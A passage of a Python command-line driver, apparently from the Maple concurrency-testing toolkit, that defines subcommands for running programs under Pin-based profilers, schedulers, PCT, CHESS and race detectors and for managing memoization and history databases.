history = idiom_history.TestHistory(sinfo, iroot_db)
history.load(options.test_history)
history.display_summary(output)
def __display_pct_history(output, options):
history = pct_history.History()
history.load(options.pct_history)
history.display(output)
def __display_pct_history_summary(output, options):
history = pct_history.History()
history.load(options.pct_history)
history.display_summary(output)
def valid_display_set():
result = set()
for name in dir(sys.modules[__name__]):
idx = name.find('__display_')
if idx != -1:
result.add(name[idx+10:])
return result
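# Display (and, below, modify) subcommands are discovered by reflection:
# any module-level function named __display_<object> shows up here, and
# __command_display() later dispatches to it via eval(), so defining a new
# __display_* function registers a new display object automatically.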
def valid_display(display):
return display in valid_display_set()
def display_usage():
usage = 'usage: <script> display [options] <object>\n\n'
usage += 'valid objects are:\n'
for display in valid_display_set():
usage += ' %s\n' % display
return usage
def register_display_options(parser):
parser.add_option(
'-i', '--input',
action='store',
type='string',
dest='input',
default='stdin',
metavar='PATH',
help='the input file name')
parser.add_option(
'-o', '--output',
action='store',
type='string',
dest='output',
default='stdout',
metavar='PATH',
help='the output file name')
parser.add_option(
'--sinfo_in',
action='store',
type='string',
dest='sinfo_in',
default='sinfo.db',
metavar='PATH',
help='the input static info database path')
parser.add_option(
'--sinfo_out',
action='store',
type='string',
dest='sinfo_out',
default='sinfo.db',
metavar='PATH',
help='the output static info database path')
parser.add_option(
'--iroot_in',
action='store',
type='string',
dest='iroot_in',
default='iroot.db',
metavar='PATH',
help='the input iroot database path')
parser.add_option(
'--iroot_out',
action='store',
type='string',
dest='iroot_out',
default='iroot.db',
metavar='PATH',
help='the output iroot database path')
parser.add_option(
'--memo_in',
action='store',
type='string',
dest='memo_in',
default='memo.db',
metavar='PATH',
help='the input memoization database path')
parser.add_option(
'--memo_out',
action='store',
type='string',
dest='memo_out',
default='memo.db',
metavar='PATH',
help='the output memoization database path')
parser.add_option(
'--test_history',
action='store',
type='string',
dest='test_history',
default='test.histo',
metavar='PATH',
help='the test history path')
parser.add_option(
'--pct_history',
action='store',
type='string',
dest='pct_history',
default='pct.histo',
metavar='PATH',
help='the PCT history path')
def __command_display(argv):
parser = optparse.OptionParser(display_usage())
register_display_options(parser)
(options, args) = parser.parse_args(argv)
if len(args) != 1 or not valid_display(args[0]):
parser.print_help()
sys.exit(0)
# open output
if options.output == 'stdout':
output = sys.stdout
elif options.output == 'stderr':
output = sys.stderr
else:
output = open(options.output, 'w')
# write output
eval('__display_%s(output, options)' % args[0])
# close output
if options.output == 'stdout':
pass
elif options.output == 'stderr':
pass
else:
output.close()
def __modify_memo_input_change(options):
if not os.path.exists(options.memo_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.clear_predicted_set()
memo_db.clear_candidate_map()
memo_db.save(options.memo_out)
logging.msg('memo input change done!\n')
def __modify_memo_mark_unexposed_failed(options):
if not os.path.exists(options.memo_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.mark_unexposed_failed()
memo_db.save(options.memo_out)
logging.msg('memo mark unexposed failed done!\n')
def __modify_memo_refine_candidate(options):
if not os.path.exists(options.memo_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.refine_candidate()
memo_db.save(options.memo_out)
logging.msg('memo refine candidate done!\n')
def __modify_memo_merge(options):
if not os.path.exists(options.memo_in):
return
if not os.path.exists(options.memo_merge_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_merge_db = memo.Memo(sinfo, iroot_db)
memo_merge_db.load(options.memo_merge_in)
memo_db.merge(memo_merge_db)
memo_db.save(options.memo_out)
logging.msg('memo merge done!\n')
def __modify_memo_apply(options):
if not os.path.exists(options.memo_in):
return
if not os.path.exists(options.memo_merge_in):
return
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_merge_db = memo.Memo(sinfo, iroot_db)
memo_merge_db.load(options.memo_merge_in)
memo_db.merge(memo_merge_db)
memo_db.refine_candidate()
memo_db.save(options.memo_out)
logging.msg('memo apply done!\n')
def valid_modify_set():
result = set()
for name in dir(sys.modules[__name__]):
idx = name.find('__modify_')
if idx != -1:
result.add(name[idx+9:])
return result
def valid_modify(modify):
return modify in valid_modify_set()
def modify_usage():
usage = 'usage: <script> modify [options] <object>\n\n'
usage += 'valid objects are:\n'
for modify in valid_modify_set():
usage += ' %s\n' % modify
return usage
def register_modify_options(parser):
parser.add_option(
'--sinfo_in',
action='store',
type='string',
dest='sinfo_in',
default='sinfo.db',
metavar='PATH',
help='the input static info database path')
parser.add_option(
'--sinfo_out',
action='store',
type='string',
dest='sinfo_out',
default='sinfo.db',
metavar='PATH',
help='the output static info database path')
parser.add_option(
'--iroot_in',
action='store',
type='string',
dest='iroot_in',
default='iroot.db',
metavar='PATH',
help='the input iroot database path')
parser.add_option(
'--iroot_out',
action='store',
type='string',
dest='iroot_out',
default='iroot.db',
metavar='PATH',
help='the output iroot database path')
parser.add_option(
'--memo_in',
action='store',
type='string',
dest='memo_in',
default='memo.db',
metavar='PATH',
help='the input memoization database path')
parser.add_option(
'--memo_out',
action='store',
type='string',
dest='memo_out',
default='memo.db',
metavar='PATH',
help='the output memoization database path')
parser.add_option(
'--memo_merge_in',
action='store',
type='string',
dest='memo_merge_in',
default='memo_merge.db',
metavar='PATH',
help='the to-merge memoization database path')
parser.add_option(
'--no_memo_failed',
action='store_false',
dest='memo_failed',
default=True,
help='whether memorize fail-to-expose iroots')
def __command_modify(argv):
parser = optparse.OptionParser(modify_usage())
register_modify_options(parser)
(options, args) = parser.parse_args(argv)
if len(args) != 1 or not valid_modify(args[0]):
parser.print_help()
sys.exit(0)
eval('__modify_%s(options)' % args[0])
def register_profile_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='runout',
metavar='MODE',
help='the profile mode: runout, timeout, stable')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_profile(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_defaults['enable_observer_new'] = True
profiler.knob_defaults['enable_predictor_new'] = True
# parse cmdline options
usage = 'usage: <script> profile [options] --- program'
parser = optparse.OptionParser(usage)
register_profile_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.ProfileTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def register_active_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='runout',
metavar='MODE',
help='the active mode: runout, timeout, finish')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_active(argv):
pin = pintool.Pin(config.pin_home())
scheduler = idiom_pintool.Scheduler()
# parse cmdline options
usage = 'usage: <script> active [options] --- program'
parser = optparse.OptionParser(usage)
register_active_cmdline_options(parser)
scheduler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
scheduler.set_cmdline_options(options, args)
# run active test
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, scheduler))
testcase = idiom_testing.ActiveTestCase(test,
options.mode,
options.threshold,
scheduler)
testcase.run()
def register_random_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='runout',
metavar='MODE',
    help='the run mode: runout, timeout')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_native(argv):
# parse cmdline options
usage = 'usage: <script> native [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
# run profile
test = testing.InteractiveTest(prog_argv)
testcase = idiom_testing.NativeTestCase(test,
options.mode,
options.threshold)
testcase.run()
def __command_pinbase(argv):
pin = pintool.Pin(config.pin_home())
# parse cmdline options
usage = 'usage: <script> pinbase [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin))
testcase = idiom_testing.NativeTestCase(test,
options.mode,
options.threshold)
testcase.run()
def __command_pct(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_defaults['strict'] = True
# parse cmdline options
usage = 'usage: <script> pct [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_pct_large(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
# parse cmdline options
usage = 'usage: <script> pct_large [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_rand_delay(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.RandSchedProfiler()
profiler.knob_defaults['delay'] = True
# parse cmdline options
usage = 'usage: <script> rand_delay [options] --- program'
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def register_chess_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='finish',
metavar='MODE',
    help='the chess mode: finish, runout, timeout')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_chess(argv):
pin = pintool.Pin(config.pin_home())
controller = idiom_pintool.ChessProfiler()
controller.knob_defaults['enable_chess_scheduler'] = True
controller.knob_defaults['enable_observer_new'] = True
# parse cmdline options
usage = 'usage: <script> chess [options] --- program'
parser = optparse.OptionParser(usage)
register_chess_cmdline_options(parser)
controller.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
controller.set_cmdline_options(options, args)
# run chess
test = testing.InteractiveTest(prog_argv)
test.set_prefix(get_prefix(pin, controller))
testcase = idiom_testing.ChessTestCase(test,
options.mode,
options.threshold,
controller)
testcase.run()
def register_race_cmdline_options(parser, prefix=''):
parser.add_option(
'--%smode' % prefix,
action='store',
type='string',
dest='%smode' % prefix,
default='runout',
metavar='MODE',
help='the race detector mode: runout, timeout, stable')
parser.add_option(
'--%sthreshold' % prefix,
action='store',
type='int',
dest='%sthreshold' % prefix,
default=1,
metavar='N',
help='the threshold (depends on mode)')
def __command_chess_race(argv):
pin = pintool.Pin(config.pin_home())
profiler = race_pintool.PctProfiler()
profiler.knob_prefix = 'race_'
profiler.knob_defaults['enable_djit'] = True
profiler.knob_defaults['ignore_lib'] = True
profiler.knob_defaults['track_racy_inst'] = True
controller = idiom_pintool.ChessProfiler()
controller.knob_prefix = 'chess_'
controller.knob_defaults['enable_chess_scheduler'] = True
controller.knob_defaults['enable_observer_new'] = True
controller.knob_defaults['sched_race'] = True
# parse cmdline options
usage = 'usage: <script> chess_race [options] --- program'
parser = optparse.OptionParser(usage)
register_race_cmdline_options(parser, 'race_')
profiler.register_cmdline_options(parser)
register_chess_cmdline_options(parser, 'chess_')
controller.register_cmdline_options(parser)
parser.set_defaults(race_mode='stable')
parser.set_defaults(race_threshold=3)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
controller.set_cmdline_options(options, args)
# create race testcase
race_test = testing.InteractiveTest(prog_argv)
race_test.set_prefix(get_prefix(pin, profiler))
race_testcase = idiom_testing.RaceTestCase(race_test,
options.race_mode,
options.race_threshold,
profiler)
# create chess testcase
chess_test = testing.InteractiveTest(prog_argv)
chess_test.set_prefix(get_prefix(pin, controller))
chess_testcase = idiom_testing.ChessTestCase(chess_test,
options.chess_mode,
options.chess_threshold,
controller)
# run
testcase = idiom_testing.ChessRaceTestCase(race_testcase,
chess_testcase)
testcase.run()
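# chess_race is a two-phase pipeline: a PCT-based race detection pass runs
# until the set of detected races is stable (race_mode/race_threshold), and
# a CHESS search with sched_race enabled then explores schedules around the
# recorded racy instructions.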
def __command_default(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_prefix = 'profile_'
profiler.knob_defaults['enable_observer_new'] = True
profiler.knob_defaults['enable_predictor_new'] = True
scheduler = idiom_pintool.Scheduler()
scheduler.knob_prefix = 'active_'
# parse cmdline options
usage = 'usage: <script> default [options] --- program'
parser = optparse.OptionParser(usage)
register_profile_cmdline_options(parser, 'profile_')
profiler.register_cmdline_options(parser)
register_active_cmdline_options(parser, 'active_')
scheduler.register_cmdline_options(parser)
parser.set_defaults(profile_mode='stable')
parser.set_defaults(profile_threshold=3)
parser.set_defaults(active_mode='finish')
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 0:
parser.print_help()
sys.exit(0)
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
scheduler.set_cmdline_options(options, args)
# create profile testcase
profile_test = testing.InteractiveTest(prog_argv)
profile_test.set_prefix(get_prefix(pin, profiler))
profile_testcase = idiom_testing.ProfileTestCase(profile_test,
options.profile_mode,
options.profile_threshold,
profiler)
# create active testcase
active_test = testing.InteractiveTest(prog_argv)
active_test.set_prefix(get_prefix(pin, scheduler))
active_testcase = idiom_testing.ActiveTestCase(active_test,
options.active_mode,
options.active_threshold,
scheduler)
# run idiom testcase
idiom_testcase = idiom_testing.IdiomTestCase(profile_testcase,
active_testcase)
idiom_testcase.run()
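# Benchmark discovery for the *_script commands: every .py module under
# script/maple/benchmark except __init__.py is a selectable benchmark name.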
def valid_benchmark_set():
result = set()
path = config.pkg_home() + '/script/maple/benchmark'
for f in os.listdir(path):
if f.endswith('.py'):
if f != '__init__.py':
result.add(f[:-3])
return result
def valid_benchmark(bench):
return bench in valid_benchmark_set()
def benchmark_usage():
usage = 'valid benchmarks are:\n'
for bench in valid_benchmark_set():
usage += ' %s\n' % bench
return usage
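# Each *_script command resolves its benchmark the same way: import
# maple.benchmark.<name> by string and ask the module for a test object.
# A minimal sketch of that shared idiom (a hypothetical helper, not part of
# the original script):
#
#     def _load_benchmark_test(bench_name, input_idx):
#         __import__('maple.benchmark.%s' % bench_name)
#         bench_mod = sys.modules['maple.benchmark.%s' % bench_name]
#         return bench_mod.get_test(input_idx)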
def __command_profile_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_defaults['enable_observer_new'] = True
profiler.knob_defaults['enable_predictor_new'] = True
# parse cmdline options
usage = 'usage: <script> profile_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_profile_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.ProfileTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_active_script(argv):
pin = pintool.Pin(config.pin_home())
scheduler = idiom_pintool.Scheduler()
# parse cmdline options
usage = 'usage: <script> active_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_active_cmdline_options(parser)
scheduler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
scheduler.set_cmdline_options(options, args)
# run active test
__import__('maple.benchmark.%s' % bench_name)
bench_mod = sys.modules['maple.benchmark.%s' % bench_name]
test = bench_mod.get_test(input_idx)
test.set_prefix(get_prefix(pin, scheduler))
testcase = idiom_testing.ActiveTestCase(test,
options.mode,
options.threshold,
scheduler)
testcase.run()
def __command_native_script(argv):
# parse cmdline options
usage = 'usage: <script> native_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
# run native test
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
testcase = idiom_testing.NativeTestCase(test,
options.mode,
options.threshold)
testcase.run()
def __command_pinbase_script(argv):
pin = pintool.Pin(config.pin_home())
# parse cmdline options
usage = 'usage: <script> pinbase_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
# run pin-base test
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin))
testcase = idiom_testing.NativeTestCase(test,
options.mode,
options.threshold)
testcase.run()
def __command_pct_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_defaults['strict'] = True
# parse cmdline options
usage = 'usage: <script> pct_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_pct_large_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
# parse cmdline options
usage = 'usage: <script> pct_large_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_rand_delay_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.RandSchedProfiler()
profiler.knob_defaults['delay'] = True
# parse cmdline options
usage = 'usage: <script> rand_delay_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_random_cmdline_options(parser)
profiler.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
# run profile
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, profiler))
testcase = idiom_testing.RandomTestCase(test,
options.mode,
options.threshold,
profiler)
testcase.run()
def __command_chess_script(argv):
pin = pintool.Pin(config.pin_home())
controller = idiom_pintool.ChessProfiler()
controller.knob_defaults['enable_chess_scheduler'] = True
controller.knob_defaults['enable_observer_new'] = True
# parse cmdline options
usage = 'usage: <script> chess_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_chess_cmdline_options(parser)
controller.register_cmdline_options(parser)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
controller.set_cmdline_options(options, args)
# run chess
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
test = bench.get_test(input_idx)
test.set_prefix(get_prefix(pin, controller))
testcase = idiom_testing.ChessTestCase(test,
options.mode,
options.threshold,
controller)
testcase.run()
def __command_chess_race_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = race_pintool.PctProfiler()
profiler.knob_prefix = 'race_'
profiler.knob_defaults['enable_djit'] = True
profiler.knob_defaults['ignore_lib'] = True
profiler.knob_defaults['track_racy_inst'] = True
controller = idiom_pintool.ChessProfiler()
controller.knob_prefix = 'chess_'
controller.knob_defaults['enable_chess_scheduler'] = True
controller.knob_defaults['enable_observer_new'] = True
controller.knob_defaults['sched_race'] = True
# parse cmdline options
usage = 'usage: <script> chess_race_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_race_cmdline_options(parser, 'race_')
profiler.register_cmdline_options(parser)
register_chess_cmdline_options(parser, 'chess_')
controller.register_cmdline_options(parser)
parser.set_defaults(race_mode='stable')
parser.set_defaults(race_threshold=3)
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
controller.set_cmdline_options(options, args)
# create race testcase
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
race_test = bench.get_test(input_idx)
race_test.set_prefix(get_prefix(pin, profiler))
race_testcase = idiom_testing.RaceTestCase(race_test,
options.race_mode,
options.race_threshold,
profiler)
# create chess testcase
chess_test = bench.get_test(input_idx)
chess_test.set_prefix(get_prefix(pin, controller))
chess_testcase = idiom_testing.ChessTestCase(chess_test,
options.chess_mode,
options.chess_threshold,
controller)
# run
testcase = idiom_testing.ChessRaceTestCase(race_testcase,
chess_testcase)
testcase.run()
def __command_default_script(argv):
pin = pintool.Pin(config.pin_home())
profiler = idiom_pintool.PctProfiler()
profiler.knob_prefix = 'profile_'
profiler.knob_defaults['enable_observer_new'] = True
profiler.knob_defaults['enable_predictor_new'] = True
scheduler = idiom_pintool.Scheduler()
scheduler.knob_prefix = 'active_'
# parse cmdline options
usage = 'usage: <script> default_script [options] --- <bench name> <input index>\n\n'
usage += benchmark_usage()
parser = optparse.OptionParser(usage)
register_profile_cmdline_options(parser, 'profile_')
profiler.register_cmdline_options(parser)
register_active_cmdline_options(parser, 'active_')
scheduler.register_cmdline_options(parser)
parser.set_defaults(profile_mode='stable')
parser.set_defaults(profile_threshold=3)
parser.set_defaults(active_mode='finish')
(opt_argv, prog_argv) = separate_opt_prog(argv)
if len(prog_argv) == 1:
bench_name = prog_argv[0]
input_idx = 'default'
elif len(prog_argv) == 2:
bench_name = prog_argv[0]
input_idx = prog_argv[1]
else:
parser.print_help()
sys.exit(0)
if not valid_benchmark(bench_name):
logging.err('invalid benchmark name\n')
(options, args) = parser.parse_args(opt_argv)
profiler.set_cmdline_options(options, args)
scheduler.set_cmdline_options(options, args)
# create profile testcase
__import__('maple.benchmark.%s' % bench_name)
bench = sys.modules['maple.benchmark.%s' % bench_name]
profile_test = bench.get_test(input_idx)
profile_test.set_prefix(get_prefix(pin, profiler))
profile_testcase = idiom_testing.ProfileTestCase(profile_test,
options.profile_mode,
options.profile_threshold,
profiler)
# create active testcase
active_test = bench.get_test(input_idx)
active_test.set_prefix(get_prefix(pin, scheduler))
active_testcase = idiom_testing.ActiveTestCase(active_test,
options.active_mode,
options.active_threshold,
scheduler)
# run idiom testcase
idiom_testcase = idiom_testing.IdiomTestCase(profile_testcase,
active_testcase)
idiom_testcase.run()
def __command_memo_tool(argv):
usage = 'usage: <script> memo_tool --operation=OP [options]'
parser = optparse.OptionParser(usage)
memo_tool = idiom_offline_tool.MemoTool()
memo_tool.register_cmdline_options(parser)
(options, args) = parser.parse_args(argv)
memo_tool.set_cmdline_options(options, args)
memo_tool.call()
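# Command dispatch is reflective: valid_command_set() collects every function
# in this module whose name contains '__command_' and exposes the suffix as a
# command name; main() validates the name and then eval()s the call. An
# eval-free equivalent (a sketch, not the original code):
#
#     func = getattr(sys.modules[__name__], '__command_%s' % command)
#     func(argv[1:])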
def valid_command_set():
result = set()
for name in dir(sys.modules[__name__]):
idx = name.find('__command_')
if idx != -1:
result.add(name[idx+10:])
return result
def valid_command(command):
return command in valid_command_set()
def command_usage():
usage = 'usage: <script> <command> [options] [args]\n\n'
usage += 'valid commands are:\n'
for command in valid_command_set():
usage += ' %s\n' % command
return usage
def main(argv):
if len(argv) < 1:
logging.err(command_usage())
command = argv[0]
logging.msg('performing command: %s ...\n' % command, 2)
if valid_command(command):
eval('__command_%s(argv[1:])' % command)
else:
logging.err(command_usage())
if __name__ == '__main__':
main(sys.argv[1:])
